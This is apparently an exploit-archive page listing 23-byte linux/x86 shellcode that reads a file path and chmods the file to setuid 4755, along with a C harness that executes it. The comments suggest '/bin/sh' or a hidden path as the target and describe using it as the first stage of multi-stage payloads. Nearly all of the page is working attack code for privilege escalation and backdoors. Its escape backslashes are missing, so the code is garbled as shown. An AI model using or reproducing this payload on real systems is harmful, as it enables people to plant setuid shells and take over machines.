linux/x86 read(0,buf,2541); chmod(buf,4755); 23 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : linux/x86 read(0,buf,2541); chmod(buf,4755); 23 bytes
# Published : 2005-11-09
# Author : Charles Stevenson
# Previous Title : HPUX execve /bin/sh 58 bytes
# Next Title : linux/x86 write(0,"Hello core!n",12); (w/optional 7 byte exit) 36 bytes

/* readnchmod-core.c by Charles Stevenson <core@bokeoa.com> 
 *
 * Example of strace output if you pass in "/bin/shx00"
 * read(0, "/bin/sh", 2541)              = 8
 * chmod("/bin/sh", 04755)                 = 0
 *
 * Any file path can be given.  For example: /tmp/.sneakyguy
 * The only caveat is that the string must be NULL terminated.
 * This shouldn't be a problem.  For multi-stage payloads send
 * in this first and then you can send it data with null bytes.
 * I made this for rare cases with tight space contraints and
 * where read() jmp *%esp is not practical.
 *
 */
char hellcode[] = /* read(0,buf,2541); chmod(buf,4755); linux/x86 by core */
"x31xdb"//               xor    %ebx,%ebx
"xf7xe3"//               mul    %ebx
"x53"//                   push   %ebx
"xb6x09"//               mov    $0x9,%dh
"xb2xed"//               mov    $0xed,%dl
"x89xe1"//               mov    %esp,%ecx
"xb0x03"//               mov    $0x3,%al
"xcdx80"//               int    $0x80
"x89xd1"//               mov    %edx,%ecx
"x89xe3"//               mov    %esp,%ebx
"xb0x0f"//               mov    $0xf,%al
"xcdx80"//               int    $0x80
;

int main(void)
{
  void (*shell)() = (void *)&hellcode;
  printf("%d byte read(0,buf,2541); chmod(buf,4755); linux/x86 by coren",
         strlen(hellcode));
  shell();
  return 0;
}

// www.Syue.com [2005-11-09]